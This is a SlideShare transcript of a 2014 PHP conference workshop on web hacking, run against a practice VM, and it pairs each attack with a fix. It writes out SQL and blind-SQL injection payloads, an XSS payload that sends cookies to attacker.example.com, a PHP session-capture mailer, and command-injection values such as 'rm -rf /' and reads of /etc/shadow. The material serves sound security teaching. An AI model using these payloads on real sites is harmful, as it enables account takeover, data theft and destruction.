SlideShare une entreprise Scribd logo
1  sur  69
Télécharger pour lire hors ligne
Hacking Sites for Fun and
Profit	
php|tek 2014
David Stockton
or How to Hack
Websites and Prevent
Your Site from Being
Hacked
What this is for
• Learn how common exploits are
done and how to identify code
that is vulnerable
• Learn how to fix code that is
susceptible to these attacks
• Learn how to attack your own
code and your own sites so you
can fix them
What this is not for
• Hacking or attacking sites
that you do not have
permission to attack
!
• If you don’t have permission,
don’t do it.
The Code
• The code I am showing you is
similar to real code I’ve seen in
real projects, but it was written
specifically for this presentation.
Gouda Times
• Provided on the VM is a hackable site - The
Gouda Times cheese shop and social
cheese site
What you need
• Virtualbox 4.3
• The VM
• A browser (preferably chrome but any
works)
• Something to send HTTP requests to the
server on the VM
Getting Started
• Copy the contents of the thumb drive -
• There are 4 files:
• Virtualbox for Mac and Windows
• The VM
• An image
Import the VM
• Start the VM in virtual box and log into the console (vagrant /
vagrant)
• ifconfig -a
• Find eth*
• Edit /etc/sysconfig/network-scripts/ifcfg-eth1
• Change DEVICE= to match eth* from above
• sudo service network restart
• mailcatcher —ip=0.0.0.0
One note about email
• On the VM is mailcatcher. It will catch any
emails that the system or you cause to be
sent. You can access it at http://
hacksite.dev:1080/
To play fair
• Don’t go on the VM after the initial set up.
However, all the code is there and if you
really want to look, feel free:
• /vagrant_web
• Try to figure out some exploits without
looking at the code first though
On your host
• Ping 192.168.33.199
• ssh vagrant@192.168.33.199 (password
vagrant)
• If this works, add a host entry (/etc/hosts
or /windws/system32/driver/etc/hosts for
hackingsite.dev to 192.168.33.199
Open your browser
Start hacking
• There are loads and loads of vulnerabilities
• If you break the VM, just re-import and start
again
• This is your VM on your computer. Anything
destructive you do is on you. Be sure you’re in
the VM before seeing if 



rm -rf /* works
A brief introduction to
common exploits
• In case this is all completely new
Exploit 1:
• SQL injection
!
• select * from users where
username =
'$_POST['username']';
SQL Injection
• $_POST['username'] = “' OR
1=1; --;”;
!
!
• select * from users where
username = '' OR 1=1; --;';
SQL Injection
• $_GET
• $_POST
• $_REQUEST
!
• what else...
SQL Injection
• $_COOKIE
!
• values from the database
!
• Some parts of $_SERVER
Errors can help attackers
• Showing SQL errors can help attackers fix SQL injection
attempts
!
• Other errors can help in other ways (some show
passwords)
!
• Turn off display_errors in production, but log errors
always
Blind SQL injection
• Make calls that take
varying amounts of time to
run. Use the time to
determine the answers to
questions about the
systems you are attacking.
Blind SQL injection
• http://news.org/news.php?id=5
• http://news.org/news.php?id=5 and 1=1
• http://news.org/news.php?id=5 and 1=2
Determine DB version
• news.php?id=5 and
substring(@@version,
1,1)=5
Subselects?
•
news.php?id=5 and
(select 1) = 1
Access to other databases/
tables
• news.php?id=12 and
(select 1 from mysql.user
limit 0,1) = 1
Guessing tables
• news.php?id=6 and
(select 1 from users
limit 0,1) =1
Guessing column names
• news.php?id=11 and (select
substring(concat(1, password),1,1) from
users limit 0,1)=1
Guessing data
• news.php?id=4 and
ascii(substring((SELECT concat(username,
0x3a, password) from users limit 0,1),
1,1))>80
!
• Increment to guess values letter by letter
Preventing SQL Injection
● mysql_real_escape_string
● Prepared statements
● Input validation and whitelists
Exploit 2:
• XSS
!
• Cross-site Scripting
What is it?
• User supplied
code running in
the browser
So? It’s their browser
• Yep, but it may not
be their code.
So? It’s their browser
• It may not be your
code, but it might
call your code in a
way you don’t want
XSS Code
<img src=”<?php echo $_POST[‘image’];?>”>
<.. javascript to open the print dialog ..>
So what?
• What if we post code into
$_POST[‘image’]
!
● Steal session cookies
● Call Javascript APIs to cause actions
on the server (CSRF)
● Post forms as the user
The payload:
$_POST[‘image’]
/images/add.gif"><script type="text/
javascript">alert('xss!');</script><img
src="
Ermahgerd er perperp.
Ooh, that’s soooo malicious,
I’m totally shaking right now
• Fine. How about this.
!
!
• image = /images/add.gif"><script type="text/
javascript">document.write('<img src="http://
attacker.example.com/session.php?' +
document.cookie + '">'); </script><img src="
WTH did that do?
• Javascript ran FROM the site
we’re attacking and it sent
your site cookies to a script
the attacker controls.
So you stole my cookie. So
what?
• Here’s what.
<?php

$session = $_GET['PHPSESSID'];

$body = 'Got session: ' . $session;

mail('attackeremail@attacker.example.org',
'Session Captured', $body);
Oooh, you emailed my
cookie... So...
Now it’s my turn...
Why this matters
• Sites identify and authenticate
users with session.
• I have identified myself as you. I
am now logged in as you and
can do anything you can do on
the site.
Ok, so I can steal my own
session
• Here’s how to use
it against someone.
The first part of the attack
• Create an email to a link on the
attacking site that posts the code to the
site under attack. Send the email to the
victim.
!
• They click the link, you steal their
session.
What else can I do?
• Cross Site Request Forgery (CSRF)
• Causing actions to happen on the user’s
behalf
• Purchasing things, changing passwords,
creating accounts, etc.
How to prevent?
• Escape output
• Whitelist URLs, domains, input
• Make the print page lookup and use image
paths from a trusted source (database
maybe?)
Prevent CSRF
• Use a CSRF token.
• Disallow requests
that don’t contain the
correct token.
Exploit prevention in
general
• Filter input
• Escape output
• This works for SQL injection, XSS and
more...
• in general
Exploit 3: Command
injection
● shell_exec
● exec
● passthru
● system
● `some command`
PHP Web File Browser
• Supposed to allow viewing of files within
the web directories
• $files = shell_exec(‘ls -al ’ .
$_GET[‘dir’]);
What’s the danger?
• $_GET[‘dir’] = ‘.; rm -rf / *’;
• Or whatever.
• cat /etc/passwd; cat /etc/shadow
How to prevent?
• If you must use user input in a command,
use escapeshellarg()
• $dir = escapeshellarg($_GET[‘dir’]);
• $files = shell_exec(‘ls -al ‘ . $dir);
• Validate that the input is allowed
Other types of injection
● Code (eval)
● Regex
● Log
● LDAP
Other exploits
● Authentication / Session management
● Information disclosure
● Sensitive data exposure
● File upload flaws
● Unchecked redirects
● Leftover debug code
● Session fixation
● Internal threats
● Privacy Violation (password in logs,
etc)
Mitigation
• Validation on the client
• Reject invalid requests entirely, log
intrusion attempt
• Principle of least privilege
• Filter input, escape output
One more exploit
• Session puzzling attack
• http://bit.ly/1eO7jPK
Session Puzzling
• Making requests to privileged and
unprivileged pages in a particular order
that can escalate privileges of the attacker
How it could work
• Page requiring authentication looks for
‘user’ in session to determine
authentication
Session Puzzling
• Login -> forgot password page sends
information via ‘user’ in session
Put it together
• Hit pages quickly in this order:
• Login -> forgot password / privileged page
• Privileged page sees ‘user’ and allows
attacker in
How was this found?	
• By accident, via web crawler getting
access to privileged pages
Now what?
• Find as many exploits as possible in
Gouda Times
• Be creative, you can use multiple exploits
in a single creative hack
• Stuck for ideas?
Ideas
• Trick the system to give up another user’s
password
• Log in to the system as another user
without knowing their password
• Change guestbook entries
• Remove guestbook entries
More ideas
• View nearly any file on the system
• Get your own code onto the system
• Find hidden functionality
• Exploit the site with an image
• Create more users than the system thinks you should
have
• Social engineering - get someone to tell you a password
Time to get with the
hacking
If you have questions or
need help I’ll be around
• If you get a hack to work, let me know and
you can share what you did and how
• If you want to try to fix it, the source is on
the VM - show me your fix, I’ll try to break it
Want to hack more?
• http://www.badstore.net/
• http://google-gruyere.appspot.com/
• http://www.dvwa.co.uk/
Please rate this tutorial
• https://joind.in/10664

Contenu connexe

Tendances

DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysis
DefCamp
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
zulla
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 

Tendances (20)

Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Xss preso
Xss presoXss preso
Xss preso
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysis
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filter
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Brute force
Brute forceBrute force
Brute force
 

Similaire à Hacking sites for fun and profit

Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
Volkan Özçelik
 
Open source security
Open source securityOpen source security
Open source security
lrigknat
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
Shubham Takode
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow
 

Similaire à Hacking sites for fun and profit (20)

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Open source security
Open source securityOpen source security
Open source security
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the Cloud
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 

Plus de David Stockton

Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)
David Stockton
 

Plus de David Stockton (17)

Phone calls and sms from php
Phone calls and sms from phpPhone calls and sms from php
Phone calls and sms from php
 
The Art of Transduction
The Art of TransductionThe Art of Transduction
The Art of Transduction
 
Using queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationUsing queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your application
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHP
 
Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2
 
API All the Things!
API All the Things!API All the Things!
API All the Things!
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHP
 
Beginning OOP in PHP
Beginning OOP in PHPBeginning OOP in PHP
Beginning OOP in PHP
 
Common design patterns in php
Common design patterns in phpCommon design patterns in php
Common design patterns in php
 
Intermediate oop in php
Intermediate oop in phpIntermediate oop in php
Intermediate oop in php
 
Grokking regex
Grokking regexGrokking regex
Grokking regex
 
Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
 
Mercurial Distributed Version Control
Mercurial Distributed Version ControlMercurial Distributed Version Control
Mercurial Distributed Version Control
 
Regular expressions and php
Regular expressions and phpRegular expressions and php
Regular expressions and php
 
PHP 5 Magic Methods
PHP 5 Magic MethodsPHP 5 Magic Methods
PHP 5 Magic Methods
 
FireBug And FirePHP
FireBug And FirePHPFireBug And FirePHP
FireBug And FirePHP
 

Dernier

Dernier (20)

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

Hacking sites for fun and profit

  • 1. Hacking Sites for Fun and Profit php|tek 2014 David Stockton
  • 2. or How to Hack Websites and Prevent Your Site from Being Hacked
  • 3. What this is for • Learn how common exploits are done and how to identify code that is vulnerable • Learn how to fix code that is susceptible to these attacks • Learn how to attack your own code and your own sites so you can fix them
  • 4. What this is not for • Hacking or attacking sites that you do not have permission to attack ! • If you don’t have permission, don’t do it.
  • 5. The Code • The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
  • 6. Gouda Times • Provided on the VM is a hackable site - The Gouda Times cheese shop and social cheese site
  • 7. What you need • Virtualbox 4.3 • The VM • A browser (preferably chrome but any works) • Something to send HTTP requests to the server on the VM
  • 8. Getting Started • Copy the contents of the thumb drive - • There are 4 files: • Virtualbox for Mac and Windows • The VM • An image
  • 9. Import the VM • Start the VM in virtual box and log into the console (vagrant / vagrant) • ifconfig -a • Find eth* • Edit /etc/sysconfig/network-scripts/ifcfg-eth1 • Change DEVICE= to match eth* from above • sudo service network restart • mailcatcher —ip=0.0.0.0
  • 10. One note about email • On the VM is mailcatcher. It will catch any emails that the system or you cause to be sent. You can access it at http:// hacksite.dev:1080/
  • 11. To play fair • Don’t go on the VM after the initial set up. However, all the code is there and if you really want to look, feel free: • /vagrant_web • Try to figure out some exploits without looking at the code first though
  • 12. On your host • Ping 192.168.33.199 • ssh vagrant@192.168.33.199 (password vagrant) • If this works, add a host entry (/etc/hosts or /windws/system32/driver/etc/hosts for hackingsite.dev to 192.168.33.199
  • 14. Start hacking • There are loads and loads of vulnerabilities • If you break the VM, just re-import and start again • This is your VM on your computer. Anything destructive you do is on you. Be sure you’re in the VM before seeing if 
 
 rm -rf /* works
  • 15. A brief introduction to common exploits • In case this is all completely new
  • 16. Exploit 1: • SQL injection ! • select * from users where username = '$_POST['username']';
  • 17. SQL Injection • $_POST['username'] = “' OR 1=1; --;”; ! ! • select * from users where username = '' OR 1=1; --;';
  • 18. SQL Injection • $_GET • $_POST • $_REQUEST ! • what else...
  • 19. SQL Injection • $_COOKIE ! • values from the database ! • Some parts of $_SERVER
  • 20. Errors can help attackers • Showing SQL errors can help attackers fix SQL injection attempts ! • Other errors can help in other ways (some show passwords) ! • Turn off display_errors in production, but log errors always
  • 21. Blind SQL injection • Make calls that take varying amounts of time to run. Use the time to determine the answers to questions about the systems you are attacking.
  • 22. Blind SQL injection • http://news.org/news.php?id=5 • http://news.org/news.php?id=5 and 1=1 • http://news.org/news.php?id=5 and 1=2
  • 23. Determine DB version • news.php?id=5 and substring(@@version, 1,1)=5
  • 25. Access to other databases/ tables • news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
  • 26. Guessing tables • news.php?id=6 and (select 1 from users limit 0,1) =1
  • 27. Guessing column names • news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
  • 28. Guessing data • news.php?id=4 and ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1), 1,1))>80 ! • Increment to guess values letter by letter
  • 29. Preventing SQL Injection ● mysql_real_escape_string ● Prepared statements ● Input validation and whitelists
  • 30. Exploit 2: • XSS ! • Cross-site Scripting
  • 31. What is it? • User supplied code running in the browser
  • 32. So? It’s their browser • Yep, but it may not be their code.
  • 33. So? It’s their browser • It may not be your code, but it might call your code in a way you don’t want
  • 34. XSS Code <img src=”<?php echo $_POST[‘image’];?>”> <.. javascript to open the print dialog ..>
  • 35. So what? • What if we post code into $_POST[‘image’] ! ● Steal session cookies ● Call Javascript APIs to cause actions on the server (CSRF) ● Post forms as the user
  • 38. Ooh, that’s soooo malicious, I’m totally shaking right now • Fine. How about this. ! ! • image = /images/add.gif"><script type="text/ javascript">document.write('<img src="http:// attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
  • 39. WTH did that do? • Javascript ran FROM the site we’re attacking and it sent your site cookies to a script the attacker controls.
  • 40. So you stole my cookie. So what? • Here’s what. <?php
 $session = $_GET['PHPSESSID'];
 $body = 'Got session: ' . $session;
 mail('attackeremail@attacker.example.org', 'Session Captured', $body);
  • 41. Oooh, you emailed my cookie... So...
  • 42. Now it’s my turn...
  • 43. Why this matters • Sites identify and authenticate users with session. • I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
  • 44. Ok, so I can steal my own session • Here’s how to use it against someone.
  • 45. The first part of the attack • Create an email to a link on the attacking site that posts the code to the site under attack. Send the email to the victim. ! • They click the link, you steal their session.
  • 46. What else can I do? • Cross Site Request Forgery (CSRF) • Causing actions to happen on the user’s behalf • Purchasing things, changing passwords, creating accounts, etc.
  • 47. How to prevent? • Escape output • Whitelist URLs, domains, input • Make the print page lookup and use image paths from a trusted source (database maybe?)
  • 48. Prevent CSRF • Use a CSRF token. • Disallow requests that don’t contain the correct token.
  • 49. Exploit prevention in general • Filter input • Escape output • This works for SQL injection, XSS and more... • in general
  • 50. Exploit 3: Command injection ● shell_exec ● exec ● passthru ● system ● `some command`
  • 51. PHP Web File Browser • Supposed to allow viewing of files within the web directories • $files = shell_exec(‘ls -al ’ . $_GET[‘dir’]);
  • 52. What’s the danger? • $_GET[‘dir’] = ‘.; rm -rf / *’; • Or whatever. • cat /etc/passwd; cat /etc/shadow
  • 53. How to prevent? • If you must use user input in a command, use escapeshellarg() • $dir = escapeshellarg($_GET[‘dir’]); • $files = shell_exec(‘ls -al ‘ . $dir); • Validate that the input is allowed
  • 54. Other types of injection ● Code (eval) ● Regex ● Log ● LDAP
  • 55. Other exploits ● Authentication / Session management ● Information disclosure ● Sensitive data exposure ● File upload flaws ● Unchecked redirects ● Leftover debug code ● Session fixation ● Internal threats ● Privacy Violation (password in logs, etc)
  • 56. Mitigation • Validation on the client • Reject invalid requests entirely, log intrusion attempt • Principle of least privilege • Filter input, escape output
  • 57. One more exploit • Session puzzling attack • http://bit.ly/1eO7jPK
  • 58. Session Puzzling • Making requests to privileged and unprivileged pages in a particular order that can escalate privileges of the attacker
  • 59. How it could work • Page requiring authentication looks for ‘user’ in session to determine authentication
  • 60. Session Puzzling • Login -> forgot password page sends information via ‘user’ in session
  • 61. Put it together • Hit pages quickly in this order: • Login -> forgot password / privileged page • Privileged page sees ‘user’ and allows attacker in
  • 62. How was this found? • By accident, via web crawler getting access to privileged pages
  • 63. Now what? • Find as many exploits as possible in Gouda Times • Be creative, you can use multiple exploits in a single creative hack • Stuck for ideas?
  • 64. Ideas • Trick the system to give up another user’s password • Log in to the system as another user without knowing their password • Change guestbook entries • Remove guestbook entries
  • 65. More ideas • View nearly any file on the system • Get your own code onto the system • Find hidden functionality • Exploit the site with an image • Create more users than the system thinks you should have • Social engineering - get someone to tell you a password
  • 66. Time to get with the hacking
  • 67. If you have questions or need help I’ll be around • If you get a hack to work, let me know and you can share what you did and how • If you want to try to fix it, the source is on the VM - show me your fix, I’ll try to break it
  • 68. Want to hack more? • http://www.badstore.net/ • http://google-gruyere.appspot.com/ • http://www.dvwa.co.uk/
  • 69. Please rate this tutorial • https://joind.in/10664